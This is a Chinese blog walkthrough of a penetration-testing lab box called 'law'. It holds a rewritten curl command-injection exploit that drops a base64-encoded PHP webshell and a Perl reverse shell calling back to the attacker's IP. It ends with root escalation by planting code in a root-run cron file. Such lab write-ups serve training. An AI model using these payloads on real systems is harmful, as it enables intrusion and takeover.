首页 > 其他分享 >law Intermediate walkthrough pg

law Intermediate walkthrough pg

时间:2024-11-10 13:18:56浏览次数:1  
标签:www shell 20 167.190 192.168 walkthrough Intermediate law php

靶场很简单分数只有10分跟平常做的20分的中级靶场比确实简单
我拿来放松的
算下来30分钟解决战斗

nmap 扫到80端口web界面

是个框架

搜exp https://www.exploit-db.com/exploits/52023

他的脚本可能有点问题看不到回显
我们审脚本直接看到漏洞点所在 命令执行
curl -s -d "sid=foo&hhook=exec&text=echo 'PD9waHAgc3lzdGVtKCRfUE9TVFthXSk7cGhwaW5mbygpOyA/Pg==' | base64 -d > shell.php" -b "sid=foo" http://192.168.167.190/ 这是我改写的exp 写入shelll.php 的webshell

反弹shell阶段
POST /shell.php HTTP/1.1

Host: 192.168.167.190

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Content-Type: application/x-www-form-urlencoded

Content-Length: 159

Origin: http://192.168.167.190

Connection: close

Referer: http://192.168.167.190/shell.php

Cookie: sid=9ush9i4fpdsee6uc8rtfue4pkr

Upgrade-Insecure-Requests: 1



a=perl%20-MIO%20-e%20'$p=fork;exit,if($p);$c=new%20IO::Socket::INET(PeerAddr,%22192.168.45.250:80%22);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_%20while<>;'

获取完整tty以后

wget 我们kali上的pspy64 运行 发现有定时任务 执行者是root

image

又发现该文件所有者是www-data
image

直接在里面加恶意代码getrootshell

image

image
提权成功

标签:www,shell,20,167.190,192.168,walkthrough,Intermediate,law,php
From: https://www.cnblogs.com/wssw/p/18537883

相关文章

  • Groove Intermediate pg walkthrough
    80端口web站点dirsearch没发现啥有用信息感觉就是让我们突破登录框进后台的https://github.com/ChurchCRM/CRM/issues/137上网查到默认密码登录后台跟具cms查exp发现有个SQL注入payload找半天找到一个可以直接sql注入http://192.168.167.44/EventAttendance.php?Actio......
  • PayDay Intermediate
    nmap+dirsearch发现web站点扫目录┌──(root㉿kali)-[/home/ftpuserr]└─#nmap-p--A192.168.167.39StartingNmap7.94SVN(https://nmap.org)at2024-11-0906:56UTCNmapscanreportfor192.168.167.39Hostisup(0.072slatency).Notshown:65527clos......
  • Vanity Intermediate 统配符提权
    nmap扫描┌──(root㉿kali)-[~]└─#nmap-p--A192.168.167.234StartingNmap7.94SVN(https://nmap.org)at2024-11-0903:59UTCStats:0:01:22elapsed;0hostscompleted(1up),1undergoingTracerouteTracerouteTiming:About32.26%done;ETC:04:00(0......
  • 论文翻译:arxiv-2024.Dillon Bowen.Scaling Laws for Data Poisoning in LLMs
    ScalingLawsforDataPoisoninginLLMshttps://arxiv.org/pdf/2408.02946论文主要研究了大型语言模型在数据中毒威胁下的脆弱性,发现模型规模越大,对有害行为的学习速度越快,强调了在更大模型中建立健全数据保护措施的必要性。在大型语言模型(LLMs)中数据投毒的规模法则......
  • POLIR-Society-Organization-Psychology-Training: The Junto Institute: {Relationsh
    POLIR-Society-Organization-Psychology-Emotionhttps://www.thejuntoinstitute.com/Emotionalintelligencetrainingformanagers&leadersintheremoteworkplace.HowYourCompanyBenefitsBettermanagersforimprovedemployeeperformanceHighermanag......
  • 解密prompt系列40. LLM推理scaling Law
    OpenAI的O-1出现前,其实就有已经有大佬开始分析后面OpenAI的技术路线,其中一个方向就是从Pretrain-scaling,Post-Train-scaling向InferenceScaling的转变,这一章我们挑3篇inference-scaling相关的论文来聊聊,前两篇分别从聚合策略和搜索策略来优化广度推理,最后一篇全面的分析了各类广......
  • Challenges of regulatory laws.
    Thechallengesandpracticesofregulatoryproblems.Firstlyfromthepointofcountrylayer,thenetworksecuritylawwaspublishedintwothousandandseventeen.(2017)AnditisthefirstBasicLawfocusingontheareaofnetworksecurityandtosetcle......
  • 电通量(electric flux)和高斯定律(Gauss‘s law)
    电通量(electricflux)图示:公式:dϕ=E⃗......
  • CMPINF 0401 Intermediate Programming
    CMPINF0401IntermediateProgrammingAssignment1Topics:Reviewofexpressions,conditions,loopsandI/OOnline:Wednesday,September4,2024Due:Allsource(.java)filesandacompletedAssignmentInformationSheetzippedintoasinglefileandsubmit......
  • A Walkthrough Using Acquire and Release Fences
    We’lltaketheexamplefrommypreviouspostandmodifyittouseC++11’sstandaloneacquireandreleasefences.Here’stheSendTestMessagefunction.Theatomicwriteisnowrelaxed,andareleasefencehasbeenplacedimmediatelybeforeit.voidSen......